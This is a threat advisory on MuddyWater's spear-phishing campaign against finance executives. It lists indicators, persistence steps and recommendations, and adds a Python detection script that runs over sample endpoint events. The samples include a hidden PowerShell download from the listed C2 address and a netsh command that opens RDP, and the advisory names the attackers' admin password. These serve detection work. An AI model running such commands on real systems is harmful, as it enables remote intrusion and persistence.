CFOs Being Targeted in MuddyWater’s Multi-Stage Phishing Campaign

APT MuddyWater is running a spear-phishing campaign aimed at CFOs and finance executives worldwide. The attack chain involves Firebase-hosted phishing sites with CAPTCHA challenges, malicious VBS scripts, and staged payloads. Attackers abuse legitimate tools such as NetBird and OpenSSH to gain persistence and remote access.

Severity Level: High

Threat Details

    1. Initial Access & Infection Vectors:
      • Spear-phishing emails impersonating Rothschild & Co recruiters.
      • Victims are directed to Firebase-hosted phishing pages using custom CAPTCHA challenges.
      • Phishing kits feature AES-encrypted redirect logic to evade detection.
    2. Payload Delivery:
      • Victims are prompted to download a ZIP file (e.g., F-144822.zip) containing a malicious VBS script (F-144822.vbs).
      • The VBS script downloads secondary payloads from attacker infrastructure (198.46.178[.]135).
      • Payload execution is hidden and staged to reduce detection likelihood.
    3. Persistence Mechanisms:
      • Installation of NetBird and OpenSSH services to establish encrypted remote tunnels.
      • Creation of hidden local admin accounts (user / Bs@202122).
      • RDP enabled and firewall rules adjusted to allow external connections.
      • Scheduled tasks created to ensure NetBird restarts on every boot.
      • Deletion of NetBird shortcuts to hide traces from victims.
    4. Infrastructure Evolution:
      • Shift observed from 192.3.95[.]152 to 198.46.178[.]135 as command-and-control infrastructure.
      • Multiple Firebase and web[.]app domains observed (googl-6c11f[.]firebaseapp[.]com, cloud-233f9[.]firebaseapp[.]com, my-sharepoint-inc[.]com).
      • Evidence of shared phishing kits across multiple domains, featuring French math-based CAPTCHA challenges.
    5. Attribution & Overlaps:
      • Overlaps in TTPs and infrastructure strongly link activity to APT MuddyWater.
      • Reuse of the same NetBird setup key, identical service names, and credentialed admin accounts across campaigns.
      • Use of AteraAgent.exe in related campaigns, consistent with MuddyWater’s history of abusing legitimate tools.
    6. Immediate Impact:
      • CFOs and finance executives are at direct risk of credential theft, persistent remote compromise, and potential financial fraud.
      • Global campaign scope with confirmed targeting across Europe, North America, South America, Africa, and Asia.

    Recommendations

    1. Audit and restrict legitimate remote-management tools such as AteraAgent and NetBird; implement application allowlisting to prevent unauthorized installations.
    2. Deploy EDR/SIEM detections for VBS script execution from temporary directories, creation of suspicious local admin accounts, and NetBird service creation.
    3. Strengthen email gateway filtering to block VBS downloaders, ZIP archives, and malicious URLs before they reach the end user.
    4. Conduct executive-level phishing training, focusing on spear-phishing with recruiter/job lures.
    5. Block the IOCs at their respective controls:
      https://www.virustotal.com/gui/collection/514a495e31bc35e8c5d9ae59c4cfe030669f0ed60242f6e33cb01c472e8ce3a4/iocs
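As an added example (not part of this advisory or the hunt.io report), the following Python script shows how the detections in recommendation 2, plus the persistence behaviours listed under Threat Details (RDP/firewall changes, NetBird scheduled task, staged download from the C2 address), can be expressed as rules over endpoint telemetry. It runs over constructed sample events in a simplified, assumed event shape rather than the exact Sysmon/Windows Security schema; host names, the service and task names, file paths and the benign events are constructed, while the two IP addresses, the account name "user" and F-144822.vbs come from the advisory.

```python
import re

# Constructed sample telemetry in a simplified event shape (assumed field names,
# not an exact Sysmon/Windows Security schema). Hosts, paths, service and task
# names are constructed; IPs, account "user" and F-144822.vbs are from the advisory.
SAMPLE_EVENTS = [
    {"source": "sysmon", "id": 1, "host": "fin-lt-01", "user": "CORP\\cfo",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\cfo\AppData\Local\Temp\F-144822.vbs"'},
    {"source": "sysmon", "id": 1, "host": "fin-lt-01", "user": "CORP\\cfo",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://198.46.178.135/a','C:\Users\cfo\AppData\Local\Temp\a.exe')"},
    {"source": "security", "id": 4720, "host": "fin-lt-01", "target_user": "user"},
    {"source": "security", "id": 4732, "host": "fin-lt-01", "target_user": "user", "group": "Administrators"},
    {"source": "system", "id": 7045, "host": "fin-lt-01", "service_name": "NetBird",
     "image_path": r"C:\Program Files\NetBird\netbird.exe service run"},
    {"source": "security", "id": 4698, "host": "fin-lt-01", "task_name": r"\NetBirdUp",
     "task_content": r"C:\Program Files\NetBird\netbird.exe up"},
    {"source": "sysmon", "id": 1, "host": "fin-lt-01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389'},
    # Benign activity on a second host: none of the rules should fire here.
    {"source": "sysmon", "id": 1, "host": "fin-lt-02", "user": "CORP\\analyst",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript C:\Scripts\inventory.vbs"},
    {"source": "security", "id": 4732, "host": "fin-lt-02", "target_user": "analyst", "group": "Remote Desktop Users"},
    {"source": "system", "id": 7045, "host": "fin-lt-02", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
]

C2_ADDRESSES = {"198.46.178.135", "192.3.95.152"}          # C2 addresses named in the advisory
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
USER_WRITABLE = re.compile(r"\\(temp|tmp|downloads|appdata)\\", re.IGNORECASE)
RDP_EXPOSURE = re.compile(r"(localport=3389|fDenyTSConnections)", re.IGNORECASE)
TUNNEL_TOOLS = ("netbird", "sshd", "openssh")               # tools abused for encrypted remote tunnels


def is_process_start(ev):
    return ev["source"] == "sysmon" and ev["id"] == 1


def rule_vbs_from_temp(ev):
    """Script host launching a .vbs from a user-writable directory (stage 1 of the chain)."""
    if is_process_start(ev) and ev["image"].lower().endswith(SCRIPT_HOSTS):
        cmd = ev["cmdline"]
        if ".vbs" in cmd.lower() and USER_WRITABLE.search(cmd):
            return "vbs_from_temp"
    return None


def rule_c2_in_cmdline(ev):
    """Any process whose command line references a known C2 address (staged download)."""
    if is_process_start(ev) and any(ip in ev["cmdline"] for ip in C2_ADDRESSES):
        return "known_c2_in_cmdline"
    return None


def rule_tunnel_service(ev):
    """Service installation (System 7045) for NetBird or OpenSSH."""
    if ev["source"] == "system" and ev["id"] == 7045:
        blob = (ev["service_name"] + " " + ev["image_path"]).lower()
        if any(tool in blob for tool in TUNNEL_TOOLS):
            return "remote_tunnel_service_installed"
    return None


def rule_tunnel_task(ev):
    """Scheduled task creation (Security 4698) that keeps NetBird running across reboots."""
    if ev["source"] == "security" and ev["id"] == 4698:
        blob = (ev["task_name"] + " " + ev["task_content"]).lower()
        if "netbird" in blob:
            return "netbird_scheduled_task"
    return None


def rule_rdp_exposed(ev):
    """Command line opening TCP/3389 in the firewall or toggling the RDP deny flag."""
    if is_process_start(ev) and RDP_EXPOSURE.search(ev["cmdline"]):
        return "rdp_exposed_by_command"
    return None


STATELESS_RULES = [rule_vbs_from_temp, rule_c2_in_cmdline, rule_tunnel_service,
                   rule_tunnel_task, rule_rdp_exposed]


def detect(events):
    """Run all rules over an event stream; the local-admin rule is stateful (4720 then 4732)."""
    alerts = []
    fresh_accounts = set()   # (host, user) pairs created earlier in this stream
    for ev in events:
        for rule in STATELESS_RULES:
            name = rule(ev)
            if name:
                alerts.append({"rule": name, "host": ev["host"], "event_id": ev["id"]})
        if ev["source"] == "security" and ev["id"] == 4720:
            fresh_accounts.add((ev["host"], ev["target_user"].lower()))
        elif ev["source"] == "security" and ev["id"] == 4732 and ev["group"].lower() == "administrators":
            if (ev["host"], ev["target_user"].lower()) in fresh_accounts:
                alerts.append({"rule": "new_account_made_local_admin", "host": ev["host"], "event_id": 4732})
    return alerts


def hosts_with_persistence_chain(alerts, threshold=3):
    """Hosts where several distinct rules fired: a stronger signal than any single alert."""
    by_host = {}
    for alert in alerts:
        by_host.setdefault(alert["host"], set()).add(alert["rule"])
    return sorted(host for host, rules in by_host.items() if len(rules) >= threshold)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print("hosts needing incident response:", hosts_with_persistence_chain(found))
```

Each rule maps to one line of the advisory's Threat Details; the stateful admin-account rule only alerts when the account added to Administrators was created earlier in the same stream, which keeps routine group changes on the second host quiet. In a real SIEM the same logic would be keyed on the native field names of your Sysmon and Security channels and the `hosts_with_persistence_chain` roll-up would drive the escalation to incident response.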

    Source:

    • https://hunt.io/blog/apt-muddywater-deploys-multi-stage-phishing-to-target-cfos

    Ampcus Cyber